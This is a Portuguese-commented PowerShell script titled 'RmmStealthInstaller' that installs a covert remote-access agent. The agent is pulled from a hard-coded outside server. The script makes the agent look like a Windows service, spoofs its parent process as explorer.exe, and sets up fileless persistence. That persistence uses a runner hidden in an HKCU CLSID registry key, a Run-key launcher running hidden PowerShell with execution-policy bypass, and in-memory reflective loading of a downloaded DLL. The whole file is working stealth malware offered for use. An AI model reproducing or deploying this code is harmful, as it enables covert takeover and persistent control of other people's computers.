<#
.SYNOPSIS
    RmmStealthInstaller (ct3) — base em ct.txt + correcções de persistência (ct1):
    Admin    -> serviço + ficheiros em %ProgramData%\...\rmm; delayed-auto; TLS 1.2 na instalação.
    No admin -> fileless Run (<=260 chars via RMM0); HKCU CLSID C,U,R,I; runner com TLS, agent id, rede/backoff.
    -Diagnostics: Run, env RMM0, CLSID, StartupApproved, simulação do arranque.
    Requires: Windows PowerShell 2.0+ para admin/bootstrap JSON; config URL deve incluir "server":"..."
.EXAMPLE
    .\ct3.txt -Config https://host/cfg.json
    .\ct3.txt -Uninstall
    .\ct3.txt -Diagnostics
#>
param(
    [string]$Config  = 'https://brconsulta.com/test/conf.cfg',
    [string]$Name    = 'WinSvcHost',
    [string]$Display = 'Windows Service Host',
    [switch]$Uninstall,
    [switch]$Diagnostics
)

$ErrorActionPreference = 'Stop'

$REG_HKLM = 'SOFTWARE\Classes\CLSID\{B2C3D4E5-F6A7-8901-BCDE-F12345678901}'
$REG_HKCU = 'Software\Classes\CLSID\{B2C3D4E5-F6A7-8901-BCDE-F12345678901}'
$RUN_KEY  = 'Software\Microsoft\Windows\CurrentVersion\Run'
$RMM_BOOT_USER_ENV = 'RMM0'

function Test-Admin {
    ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Enable-Tls12ForHttps {
    param([string]$url)
    if ($url -notmatch '^\s*https://') { return }
    try {
        $t12 = [Net.SecurityProtocolType]::Tls12
        [Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor $t12
    } catch { }
}

function Get-ServerUrl {
    param([string]$url)
    Enable-Tls12ForHttps $url
    $raw = (New-Object Net.WebClient).DownloadString($url)
    $srv = $null
    if ($PSVersionTable.PSVersion.Major -ge 3) {
        $j = $raw | ConvertFrom-Json
        if ($j) { $srv = $j.server }
    }
    if (-not $srv -and ($raw -match '"server"\s*:\s*"([^"]+)"')) {
        $srv = $matches[1]
    }
    if (-not $srv) { throw "Config missing 'server' key." }
    $srv.TrimEnd('/')
}

function Escape-JsonStr {
    param([string]$s)
    if ($null -eq $s) { return '' }
    return (($s -replace '\\', '\\\\') -replace '"', '\"')
}

function Write-BootstrapJson {
    param(
        [string]$LiteralPath,
        [string]$AgentId,
        [string]$ServerBase,
        [string[]]$DownloadUrls,
        [string]$Sha256,
        [string]$SpawnMethod,
        [string]$SpoofParent,
        [string]$DllPath,
        [string]$DataDirectory,
        [string]$ServiceName,
        [int]$WatchIntervalMs
    )
    $urlParts = @()
    foreach ($u in $DownloadUrls) {
        $urlParts += ('"' + (Escape-JsonStr $u) + '"')
    }
    $urlsJoined = [string]::Join(', ', $urlParts)
    $json = @"
{
  "AgentId": "$(Escape-JsonStr $AgentId)",
  "ServerBase": "$(Escape-JsonStr $ServerBase)",
  "DownloadUrls": [ $urlsJoined ],
  "Sha256": "$(Escape-JsonStr $Sha256)",
  "SpawnMethod": "$(Escape-JsonStr $SpawnMethod)",
  "SpoofParent": "$(Escape-JsonStr $SpoofParent)",
  "DllPath": "$(Escape-JsonStr $DllPath)",
  "DataDirectory": "$(Escape-JsonStr $DataDirectory)",
  "ServiceName": "$(Escape-JsonStr $ServiceName)",
  "WatchIntervalMs": $WatchIntervalMs
}
"@
    Set-Content -LiteralPath $LiteralPath -Value $json.Trim() -Encoding UTF8
}

function New-FilelessRunnerScript {
    param([string]$HkcuClsidPath)
    # Compact runner in registry (R): TLS, agent id, initial delay, Wait-NetworkReady poll, exponential backoff.
    return '$k=[Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(''' + $HkcuClsidPath + '''); ' +
           'if(-not $k){exit}; ' +
           '$u=$k.GetValue(''U'');$i=$k.GetValue(''I'');$k.Close(); ' +
           'if(-not $u){exit}; ' +
           'if($i -and ($i -match ''^[a-fA-F0-9]{32}$'')){[Environment]::SetEnvironmentVariable(''RMM_AGENT_ID'',$i,''Process'')}; ' +
           'if($u.StartsWith(''https'')){try{[Net.ServicePointManager]::SecurityProtocol=[Net.ServicePointManager]::SecurityProtocol-bor[Net.SecurityProtocolType]::Tls12}catch{}}; ' +
           'Start-Sleep -Seconds 5; ' +
           '$env:RMM_SERVER=$u; $env:RMM_FILELESS=''1''; $env:RMM_ALLOW_MODULES=''''; ' +
           '$d=5; while($true){ while(-not [System.Net.NetworkInformation.NetworkInterface]::GetIsNetworkAvailable()){Start-Sleep -Seconds 3}; try{ ' +
           '$dll=(New-Object Net.WebClient).DownloadData($u+''/download/RmmAgent.dll''); ' +
           '$asm=[Reflection.Assembly]::Load($dll); ' +
           '$tp=$asm.GetType(''RmmAgent.Core.AgentEntryPoint''); ' +
           '$m=$tp.GetMethod(''RunAsync'',[Reflection.BindingFlags]''Public,Static''); ' +
           '$m.Invoke($null,@([Threading.CancellationToken]::None)).GetAwaiter().GetResult(); break ' +
           '}catch{Start-Sleep $d; if($d -lt 300){$d=$d*2}} }'
}

# --- Admin path (real RmmBootstrap + bootstrap.json, same idea as RmmInstaller) ---

function Install-AsAdmin {
    Write-Host "[*] Fetching config from $Config..."
    $srv = Get-ServerUrl $Config
    $base = $srv.TrimEnd('/')
    Write-Host "[+] Server: $srv"

    $installRoot = Join-Path $env:ProgramData 'Microsoft\Windows\rmm'
    if (-not (Test-Path $installRoot)) {
        New-Item -ItemType Directory -Path $installRoot -Force | Out-Null
    }

    $bootExe = Join-Path $installRoot "$Name.exe"
    $dllPath = Join-Path $installRoot 'RmmAgent.dll'
    $cfgPath = Join-Path $installRoot 'bootstrap.json'
    $idPath  = Join-Path $installRoot 'agent.id'

    Write-Host "[*] Downloading RmmBootstrap.exe -> $bootExe"
    $wc = New-Object Net.WebClient
    try {
        Enable-Tls12ForHttps $base
        $wc.DownloadFile("$base/download/RmmBootstrap.exe", $bootExe)
    } finally {
        $wc.Dispose()
    }

    Write-Host "[*] Downloading RmmAgent.dll -> $dllPath"
    $wc2 = New-Object Net.WebClient
    try {
        $wc2.DownloadFile("$base/download/RmmAgent.dll", $dllPath)
    } finally {
        $wc2.Dispose()
    }

    $agentId = $null
    if (Test-Path $idPath) {
        $agentId = ([System.IO.File]::ReadAllText($idPath)).Trim()
    }
    if (-not $agentId) {
        $agentId = [guid]::NewGuid().ToString('N')
    }
    Set-Content -LiteralPath $idPath -Value $agentId -Encoding ascii -NoNewline

    Write-BootstrapJson -LiteralPath $cfgPath `
        -AgentId $agentId `
        -ServerBase $srv `
        -DownloadUrls @("$base/download/RmmAgent.dll") `
        -Sha256 '' `
        -SpawnMethod 'activeuser' `
        -SpoofParent 'explorer.exe' `
        -DllPath $dllPath `
        -DataDirectory $installRoot `
        -ServiceName $Name `
        -WatchIntervalMs 5000
    Write-Host "[+] bootstrap.json / agent.id written under $installRoot"

    $svcName = $Name
    Write-Host "[*] Installing service '$svcName' -> `"$bootExe`" --service"
    sc.exe stop $svcName 2>$null
    Start-Sleep -Seconds 2
    sc.exe delete $svcName 2>$null
    Start-Sleep -Seconds 1

    sc.exe create $svcName "binPath=$bootExe --service" start= auto "DisplayName=$Display"
    if ($LASTEXITCODE -ne 0) { throw "sc.exe create failed (exit $LASTEXITCODE)." }
    sc.exe description $svcName "Remote Management Service"
    sc.exe failure $svcName reset= 60 actions= restart/5000/restart/10000/restart/30000
    sc.exe config $svcName start= delayed-auto | Out-Null
    Write-Host "[+] Service start type: delayed-auto (network-friendly boot)."

    sc.exe start $svcName
    if ($LASTEXITCODE -ne 0) {
        Write-Host "[!] sc.exe start returned $LASTEXITCODE (service may start on next boot)." -ForegroundColor Yellow
    }

    $missing = @()
    if (-not (Test-Path -LiteralPath $bootExe)) { $missing += $bootExe }
    if (-not (Test-Path -LiteralPath $dllPath))  { $missing += $dllPath }
    if (-not (Test-Path -LiteralPath $cfgPath))  { $missing += $cfgPath }
    if ($missing.Count -gt 0) {
        throw "Post-install validation failed; missing: $($missing -join ', ')"
    }

    $q = sc.exe query $svcName 2>&1 | Out-String
    if ($q -match 'RUNNING') {
        Write-Host "[+] Service $svcName is RUNNING."
    } else {
        Write-Host "[*] Service state:`n$q"
        Write-Host "[+] Service $svcName installed (verify RUNNING after reboot if needed)."
    }
}

# --- User path (fileless) ---

function Install-AsUser {
    Write-Host "[*] No admin - fileless user-mode installation (ct3)."

    Write-Host "[*] Fetching config from $Config..."
    $srv = Get-ServerUrl $Config
    Write-Host "[+] Server: $srv"

    $hkcuPath = $REG_HKCU
    $agentIdHex = [guid]::NewGuid().ToString('N')
    $runner = New-FilelessRunnerScript -HkcuClsidPath $hkcuPath

    Write-Host "[*] Writing HKCU registry (C, U, R, I)..."
    $k = [Microsoft.Win32.Registry]::CurrentUser.CreateSubKey($REG_HKCU)
    $k.SetValue('C', [string]$Config, 'String')
    $k.SetValue('U', [string]$srv,    'String')
    $k.SetValue('R', [string]$runner, 'String')
    $k.SetValue('I', [string]$agentIdHex, 'String')
    $k.Close()
    Write-Host "[+] Registry: HKCU\$REG_HKCU (R=runner, I=agentId $agentIdHex)"

    $bootstrap = '$p=''' + $REG_HKCU + ''';$k=[Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($p);' +
        'if(-not $k){exit};$s=$k.GetValue(''R'');$k.Close();if(-not $s){exit};Invoke-Expression $s'

    [Environment]::SetEnvironmentVariable($RMM_BOOT_USER_ENV, $bootstrap, 'User')
    try { [Environment]::SetEnvironmentVariable('RMM_FL_BOOT', $null, 'User') } catch { }

    $bootInvoke = [scriptblock]::Create(
        "iex([Environment]::GetEnvironmentVariable('$RMM_BOOT_USER_ENV','User'))")
    $invokeCmd = '& { ' + $bootInvoke.ToString().Trim() + ' }'

    $conhostFull = [System.IO.Path]::Combine($env:WINDIR, 'System32\conhost.exe')
    $psExeFull = [System.IO.Path]::Combine($env:WINDIR, 'System32\WindowsPowerShell\v1.0\powershell.exe')
    $cmd = $conhostFull + ' --headless ' + $psExeFull +
        ' -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -Command "' + $invokeCmd + '"'
    $psArgs = @(
        '-NoProfile',
        '-NonInteractive',
        '-WindowStyle', 'Hidden',
        '-ExecutionPolicy', 'Bypass',
        '-Command', $invokeCmd
    )

    Write-Host "[*] Run command length: $($cmd.Length) (MSDN max 260 for Run value)."
    if ($cmd.Length -gt 260) {
        throw "Run command exceeds 260 characters ($($cmd.Length)); shorten flags or env name."
    }

    Write-Host "[*] Writing Run key (-Command + User env $RMM_BOOT_USER_ENV)..."
    $rk = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(
        $RUN_KEY, [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree)
    if (-not $rk) {
        throw "Cannot open HKCU\$RUN_KEY for write."
    }
    try {
        $rk.SetValue($Name, $cmd, 'String')
    } finally {
        $rk.Close()
    }
    Write-Host "[+] Run key: HKCU\$RUN_KEY\$Name"

    Write-Host "[*] Launching agent..."
    Start-Process -FilePath $psExeFull -ArgumentList $psArgs -WindowStyle Hidden
    Write-Host "[+] Agent launched."
}

# --- Uninstall ---

function Uninstall-All {
    if (Test-Admin) {
        sc.exe stop $Name 2>$null
        Start-Sleep -Seconds 2
        sc.exe delete $Name 2>$null

        $installRoot = Join-Path $env:ProgramData 'Microsoft\Windows\rmm'
        if (Test-Path $installRoot) {
            Remove-Item -LiteralPath $installRoot -Recurse -Force -ErrorAction SilentlyContinue
        }
        $legacyExe = "$env:ProgramData\Microsoft\Windows\$Name.exe"
        if (Test-Path $legacyExe) { Remove-Item -LiteralPath $legacyExe -Force -ErrorAction SilentlyContinue }

        $hklm = $null
        try {
            $hklm = [Microsoft.Win32.RegistryKey]::OpenBaseKey('LocalMachine', 'Registry64')
        } catch {
            $hklm = [Microsoft.Win32.Registry]::LocalMachine
        }
        try { $hklm.DeleteSubKeyTree($REG_HKLM, $false) } catch { }
        if ($hklm) { $hklm.Close() }
        Write-Host "[+] Admin artifacts removed."
    }
    try { [Microsoft.Win32.Registry]::CurrentUser.DeleteSubKeyTree($REG_HKCU, $false) } catch { }
    $rk = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(
        $RUN_KEY, [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree)
    if ($rk) { $rk.DeleteValue($Name, $false); $rk.Close() }
    try { [Environment]::SetEnvironmentVariable($RMM_BOOT_USER_ENV, $null, 'User') } catch { }
    try { [Environment]::SetEnvironmentVariable('RMM_FL_BOOT', $null, 'User') } catch { }
    Write-Host "[+] User artifacts removed."
}

function Invoke-FilelessDiagnostics {
    param([string]$Name)
    Write-Host '=== ct3 fileless diagnostics (HKCU do utilizador actual) ===' -ForegroundColor Cyan

    $rkHive = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($RUN_KEY)
    if (-not $rkHive) {
        Write-Host "[!] Não foi possível abrir HKCU\$RUN_KEY" -ForegroundColor Red
        return
    }
    $runVal = $null
    try { $runVal = $rkHive.GetValue($Name) } finally { $rkHive.Close() }
    if ([string]::IsNullOrEmpty($runVal)) {
        Write-Host "[!] Valor Run em falta: HKCU\$RUN_KEY\$Name" -ForegroundColor Red
    } else {
        Write-Host "[+] Run '$Name' comprimento: $($runVal.Length) (limite MSDN 260)"
        if ($runVal.Length -gt 260) {
            Write-Host '[!] Run excede 260 caracteres — arranque após reboot pode falhar.' -ForegroundColor Red
        }
        Write-Host "    Valor: $runVal"
    }

    $envB = [Environment]::GetEnvironmentVariable($RMM_BOOT_USER_ENV, 'User')
    if ([string]::IsNullOrEmpty($envB)) {
        Write-Host "[!] Env User '$RMM_BOOT_USER_ENV' vazia ou inexistente (HKCU\Environment)" -ForegroundColor Red
    } else {
        Write-Host "[+] Env '$RMM_BOOT_USER_ENV' comprimento: $($envB.Length)"
        $take = [Math]::Min(200, $envB.Length)
        Write-Host "    Início: $($envB.Substring(0, $take))"
    }

    $cls = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($REG_HKCU)
    if (-not $cls) {
        Write-Host "[!] Chave CLSID em falta: HKCU\$REG_HKCU" -ForegroundColor Red
    } else {
        try {
            Write-Host '[+] Valores na chave CLSID:'
            foreach ($vn in @('C', 'U', 'R', 'I', 'T')) {
                $v = $cls.GetValue($vn)
                if ($null -eq $v) {
                    Write-Host "    $vn : (ausente)"
                } elseif ($v -is [string]) {
                    Write-Host "    $vn : comprimento $($v.Length)"
                } else {
                    Write-Host "    $vn : <não-string>"
                }
            }
        } finally {
            $cls.Close()
        }
    }

    $sap = 'Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run'
    $sk = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($sap)
    if ($sk) {
        try {
            $names = $sk.GetValueNames()
            if ($names -contains $Name) {
                Write-Host "[*] Existe entrada em StartupApproved\Run para '$Name' (UI pode desactivar arranque)." -ForegroundColor Yellow
            } else {
                Write-Host "[+] Sem chave StartupApproved com o nome '$Name' (nomes podem ser hash — ver Definições > Aplicações de arranque)."
            }
        } finally {
            $sk.Close()
        }
    }

    Write-Host ''
    Write-Host '[*] Backoff no runner (R): 5s inicial, poll rede 3s, retry 5->300s entre downloads.' -ForegroundColor DarkGray
    Write-Host '[*] Teste manual Win+R: cola o valor exacto da Run (-Command).' -ForegroundColor Yellow
    Write-Host '[*] Simulação com janela visível (mesmo -Command que a Run).' -ForegroundColor Yellow
    $invokeDiag = '& { try { ' + [scriptblock]::Create(
        "iex([Environment]::GetEnvironmentVariable('$RMM_BOOT_USER_ENV','User'))").ToString().Trim() +
        ' } catch { Write-Host ($_ | Out-String); Read-Host ''Enter para fechar'' } }'
    $psExe = [System.IO.Path]::Combine($env:WINDIR, 'System32\WindowsPowerShell\v1.0\powershell.exe')
    Start-Process -FilePath $psExe -ArgumentList @(
        '-NoProfile',
        '-WindowStyle', 'Normal',
        '-ExecutionPolicy', 'Bypass',
        '-Command', $invokeDiag
    ) -Wait
    Write-Host '[+] Simulação terminou.'
}

# --- Entry point ---

if ($Diagnostics) {
    Invoke-FilelessDiagnostics -Name $Name
    exit 0
}
if ($Uninstall) {
    Uninstall-All
} elseif (-not $Config) {
    Write-Error "Usage: .\ct3.txt -Config <url> | -Uninstall | -Diagnostics"
    exit 1
} elseif (Test-Admin) {
    Install-AsAdmin
} else {
    Install-AsUser
}
